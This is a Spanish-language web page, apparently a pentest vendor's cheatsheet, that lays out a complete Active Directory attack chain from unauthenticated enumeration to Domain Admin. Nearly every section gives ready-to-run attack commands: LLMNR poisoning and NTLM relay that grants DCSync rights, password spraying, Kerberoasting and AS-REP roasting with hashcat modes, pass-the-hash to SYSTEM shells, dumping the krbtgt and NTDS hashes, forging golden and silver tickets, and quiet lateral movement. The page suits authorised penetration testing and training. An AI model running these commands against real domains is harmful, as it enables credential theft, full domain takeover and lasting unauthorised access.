Active Directory — Cheatsheet de Ataques 2026

La referencia completa de ataque a Active Directory — de la enumeración sin autenticación a Domain Admin. Kerberoasting, relay NTLM, Pass-the-Hash, DCSync, Golden Ticket, BloodHound y movimiento lateral.

Última actualización:

¿Principiante? Lee nuestra guía completa para empezar y sitúa los ataques AD en la metodología.

Navegación rápida

01 Enumeración 02 BloodHound 03 LLMNR / Relay NTLM 04 Password Spraying 05 AS-REP Roasting 06 Kerberoasting 07 Pass-the-Hash 08 DCSync 09 Golden / Silver Ticket 10 Movimiento lateral

# Enumeración del dominio

Mapea el dominio antes de atacar. NetExec (antes CrackMapExec) e Impacket son los caballos de batalla. Empieza sin autenticación y repite con cada credencial que consigas.

nxc smb 10.10.10.0/24
Barrer la subred — identificar hosts, nombre de dominio, firma SMB
enum4linux-ng -A DC_IP
Enumeración sin autenticación completa: usuarios, recursos, grupos, política de contraseñas
nxc smb DC_IP -u '' -p '' --users
Enumeración de usuarios por sesión nula
ldapsearch -x -H ldap://DC_IP -b "DC=domain,DC=local" "(objectClass=user)" sAMAccountName
Enumerar todos los usuarios del dominio vía LDAP
nxc smb DC_IP -u user -p pass --shares
Listar recursos accesibles con credenciales válidas
nxc smb DC_IP -u user -p pass --pass-pol
Obtener la política de contraseñas (umbral de bloqueo antes del spraying)
GetADUsers.py -all domain/user:pass -dc-ip DC_IP
Impacket — listar todos los usuarios con último inicio de sesión y fecha de creación

# BloodHound — mapear rutas a DA

BloodHound grafica la ruta de ataque más corta a Domain Admin. Recopila los datos y deja que el grafo planifique tu cadena.

bloodhound-python -u user -p pass -d domain.local -ns DC_IP -c all
Colector Python — nada que ejecutar en el objetivo
nxc ldap DC_IP -u user -p pass --bloodhound --collection-method all
Recopilar datos de BloodHound directamente desde NetExec
.\SharpHound.exe -c All
Colector de Windows ejecutado desde un punto de apoyo en el dominio
💡 Consejo: tras importar, ejecuta la consulta integrada «Shortest Paths to Domain Admins» y marca los nodos comprometidos como «Owned» para revelar cadenas ya explotables.

# Envenenamiento LLMNR/NBT-NS & relay NTLM

Sin ninguna credencial, envenena la resolución de nombres para capturar hashes NetNTLM — luego crackéalos o reléalos.

responder -I eth0 -wv
Envenenar LLMNR/NBT-NS/MDNS y capturar hashes NetNTLMv2
hashcat -m 5600 hashes.txt rockyou.txt
Crackear offline los hashes NetNTLMv2 capturados
ntlmrelayx.py -tf targets.txt -smb2support
Relay de la autenticación capturada a hosts sin firma SMB
ntlmrelayx.py -t ldap://DC_IP --escalate-user user
Relay a LDAP para otorgar a tu usuario permisos DCSync

# Password Spraying

Prueba una contraseña común contra todos los usuarios — mantente bajo el umbral de bloqueo obtenido de la política.

nxc smb DC_IP -u users.txt -p 'Temporada2026!' --continue-on-success
Rociar una sola contraseña sobre todos los usuarios
kerbrute passwordspray -d domain.local users.txt 'Welcome1'
Spray basado en Kerberos (más silencioso en algunos entornos)
nxc smb DC_IP -u users.txt -p passwords.txt --no-bruteforce
Emparejar user[i] con password[i] (credential stuffing)
⚠️ Advertencia: comprueba siempre --pass-pol primero. Bloquear cuentas es ruidoso y disruptivo — nunca rocíes a ciegas.

# AS-REP Roasting

Las cuentas sin preautenticación Kerberos permiten solicitar un AS-REP y crackearlo offline — a veces sin ninguna credencial.

GetNPUsers.py domain/ -usersfile users.txt -no-pass -dc-ip DC_IP
Encontrar cuentas AS-REP roasteables sin credenciales
GetNPUsers.py domain/user:pass -request -dc-ip DC_IP
Autenticado — obtener todos los hashes AS-REP del dominio
hashcat -m 18200 asrep.txt rockyou.txt
Crackear offline los hashes AS-REP

# Kerberoasting

Cualquier usuario autenticado puede solicitar TGS para cuentas SPN. Las contraseñas de cuentas de servicio suelen ser débiles — crackéalas para escalar.

GetUserSPNs.py domain/user:pass -dc-ip DC_IP -request
Solicitar TGS de todas las cuentas SPN (Impacket)
nxc ldap DC_IP -u user -p pass --kerberoasting kerb.txt
Kerberoast directamente desde NetExec
hashcat -m 13100 kerb.txt rockyou.txt
Crackear offline los hashes TGS
💡 Consejo: apunta primero a los SPN de alto valor — las cuentas de servicio miembros de grupos privilegiados dan el mayor salto.

# Pass-the-Hash

Autentícate con un hash NTLM en lugar de una contraseña — sin crackear. La columna vertebral del movimiento lateral en AD.

nxc smb OBJETIVO -u Administrator -H aad3b435b51404ee:HASH
Validar el hash en varios hosts — busca Pwn3d!
evil-winrm -i OBJETIVO -u Administrator -H HASH
Obtener una shell PowerShell interactiva con el hash
psexec.py -hashes :HASH Administrator@OBJETIVO
Shell SYSTEM vía Impacket PsExec usando el hash
secretsdump.py -hashes :HASH Administrator@OBJETIVO
Volcar SAM local + secretos LSA del objetivo

# DCSync

Con permisos de replicación, pide a un controlador de dominio el hash de cualquier cuenta — incluido krbtgt, la clave de los Golden Tickets.

secretsdump.py domain/user:pass@DC_IP
DCSync remoto — volcar todos los hashes del dominio
secretsdump.py domain/user:pass@DC_IP -just-dc-user krbtgt
Volcar solo el hash de krbtgt (para Golden Ticket)
nxc smb DC_IP -u user -p pass --ntds
Volcar la base NTDS.dit vía NetExec

# Golden & Silver Tickets

Forja tickets Kerberos para un control total y persistente. Golden = TGT forjado (hash krbtgt). Silver = TGS forjado para un servicio (hash de la cuenta de servicio).

ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-... -domain domain.local Administrator
Forjar un Golden Ticket suplantando a Administrator
export KRB5CCNAME=Administrator.ccache; psexec.py -k -no-pass domain.local/Administrator@DC
Usar el ticket forjado para obtener una shell SYSTEM
ticketer.py -nthash SERVICE_HASH -domain-sid S-1-5-21-... -domain domain.local -spn cifs/server Administrator
Forjar un Silver Ticket para un servicio concreto (más sigiloso — sin contacto con el DC)

# Movimiento lateral & shells

Muévete entre hosts con las credenciales y tickets recopilados.

HerramientaAccesoNotas
psexec.pySYSTEMRuidoso, crea un servicio — el más detectado
wmiexec.pyUsuarioSemiinteractivo, sin servicio (más silencioso)
smbexec.pySYSTEMNingún archivo escrito en disco
evil-winrmUsuarioPowerShell completa — requiere WinRM (5985)
atexec.pySYSTEMEjecuta vía tarea programada
wmiexec.py domain/user:pass@OBJETIVO
Shell semiinteractiva silenciosa vía WMI
evil-winrm -i OBJETIVO -u user -p pass
PowerShell interactiva vía WinRM
nxc smb OBJETIVOS.txt -u user -p pass -x "whoami"
Ejecutar un comando en varios hosts a la vez

❓ FAQ pentest Active Directory

La enumeración. Sin autenticación, ejecuta responder para capturar hashes y enum4linux-ng/nxc contra el dominio. En cuanto tengas credenciales, recopila la superficie con BloodHound.

Solicitar TGS para cuentas con SPN. El ticket se cifra con el hash de la cuenta de servicio, crackeado offline con hashcat -m 13100. Cualquier usuario del dominio puede pedirlos — ataque clásico de bajo a alto privilegio.

Kerberoasting apunta a cuentas SPN y crackea el TGS (-m 13100). AS-REP roasting apunta a cuentas sin preauth Kerberos y crackea el AS-REP (-m 18200) — posible sin credenciales si conoces un nombre válido.

Autenticarse con un hash NTLM en lugar de una contraseña en claro. Herramientas como nxc, evil-winrm e Impacket aceptan -H para usar el hash directamente — sin crackear.

Abusar de la replicación de directorio para pedir a un DC el hash de cualquier cuenta — incluidos krbtgt y los Domain Admins. Requiere permisos de replicación; secretsdump.py lo ejecuta remotamente.

Un TGT forjado firmado con el hash de krbtgt. Como krbtgt firma cada ticket, poseer su hash permite suplantar a cualquiera (incl. Domain Admin) indefinidamente — la persistencia definitiva. Consigue primero el hash de krbtgt vía DCSync.

Grafica las rutas más cortas a Domain Admin a partir de datos AD (usuarios, grupos, sesiones, ACL). Recopila con SharpHound o bloodhound-python, y ejecuta «Shortest Path to Domain Admins».

NetExec (antes CrackMapExec), Impacket (secretsdump, GetUserSPNs, psexec, ntlmrelayx), Responder, BloodHound, evil-winrm y hashcat. La mayoría vienen con Kali Linux.

📚 Recursos relacionados

Informe de pentest asistido por IA

Convierte tu compromiso de AD en un informe PDF profesional. La IA rellena CVE, CVSS y severidad.

Probar gratis →

¿Quieres los 12 020+ comandos?

Esta cheatsheet de AD es solo una rama del mapa. Pentest Mindmap organiza 12 020+ comandos en 34 categorías — de recon a post-explotación — con búsqueda instantánea y copia en un clic.

Empezar gratis →